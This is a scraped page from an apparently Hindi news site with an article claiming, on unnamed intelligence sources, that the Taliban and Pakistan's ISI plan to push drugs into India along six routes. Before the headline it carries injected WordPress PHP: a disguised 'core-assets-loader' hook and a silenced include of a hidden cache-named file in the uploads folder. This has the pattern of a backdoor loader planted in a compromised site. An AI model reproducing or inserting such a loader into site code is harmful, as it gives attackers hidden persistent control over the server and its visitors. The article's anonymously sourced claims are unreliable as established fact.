add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); भारत में 6 रूट से अपना ड्रग का कारोबार बढ़ाने की तैयारी कर रहा तालिबान | ISI की ये है साजिश – SOCH INDIA
Menu

देश
भारत में 6 रूट से अपना ड्रग का कारोबार बढ़ाने की तैयारी कर रहा तालिबान | ISI की ये है साजिश

nobanner

तालिबान भारत में 6 रूटों के जरिए अपना ड्रग का कारोबार बढ़ाने की तैयारी कर रहा है. उधर पाकिस्तानी खुफिया एजेंसी आईएसआई उसके खाली बैठे लड़ाकों का उपयोग भारत में करने की साजिश रच रही है. इसके साथ ही बड़ा खुलासा यह भी है कि पिछले महीने दिल्ली में पकड़ी गई 2500 करोड़ रुपये की हेरोइन के पीछे अफगानिस्तान में बैठे तालिबान के लोग ही थे.

अफगानिस्तान में सत्ता में आए तालिबान की आमदनी का सबसे बड़ा हथियार है ड्रग का कारोबार. इसी कारोबार के जरिए तालिबान का काला कानून चलता है और उसके नेता अपने लड़ाकों पर कब्जा करके रखते हैं. पहले यह कारोबार चोरी छुपे होता था क्योंकि अफगानिस्तान में मौजूद अमेरिकी सेना इस बात का ख्याल रखती थी कि उसके रूटों के जरिए ड्रग के कारोबार को बढ़ावा ना मिल सके लेकिन अब खुद तालिबान ही बन बैठा है अफगानिस्तान का खुदा और यूएस आर्मी भी अफगानिस्तान छोड़ कर जा चुकी है. ऐसे मे अपने कारोबार को बढ़ाने के लिए तालिबान का बड़े पैमाने पर ड्रग को बेचने का प्लान बना है.

खुफिया सूत्रों के मुताबिक तालिबान का आलाकमान यह मानता है कि भारत उसके लिए नार्को टेरेरिज्म का एक बड़ा बाजार है, जहां से वो अपनी कमाई बढ़ाने के साथ ही दूसरे देशों पाकिस्तान और चीन से भी अपना हित साध सकता है. लिहाजा तालिबान का नया ड्रग रूट प्लान बना है. खुफिया सूत्रों के मुताबिक पाकिस्तानी खुफिया एजेंसी आईएसआई तालिबान को अपने रूटों के जरिए भारत में ड्रग्स भेजने की पहल का इजहार कर चुकी है.

इसके पीछे पाक की नापाक सोच है कि जब ड्रग्स जाएगा तो उसका मुनाफा उसे भी मिलेगा, जिसका प्रयोग वह आंतक के कामों में कर सकेगा. लिहाजा उसने अपने रूटों के जरिए ड्रग्स के कारोबार को बढ़ाने के लिए कहा है और तालिबान आलाकमान को आईएसआई का यह प्लान पसंद भी आ गया है.